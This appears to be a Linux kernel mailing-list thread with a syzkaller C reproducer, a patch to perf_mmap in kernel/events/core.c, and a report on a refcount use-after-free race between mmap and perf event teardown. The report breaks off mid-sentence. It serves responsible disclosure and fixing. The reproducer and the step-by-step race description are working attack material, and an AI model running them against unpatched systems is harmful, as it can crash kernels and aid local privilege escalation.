__thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Syzkaller reported a refcount_t: addition on 0; use-after-free warning in perf_mmap. The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Reported-by: kernel test robot <lkp@intel.com> Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/ Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com> --- kernel/events/core.c | 38 +++++++++++++++++++------------------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..abefd1213582 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449 -- 2.51.0
{ "author": "Haocheng Yu <yuhaocheng035@gmail.com>", "date": "Mon, 2 Feb 2026 15:44:35 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, 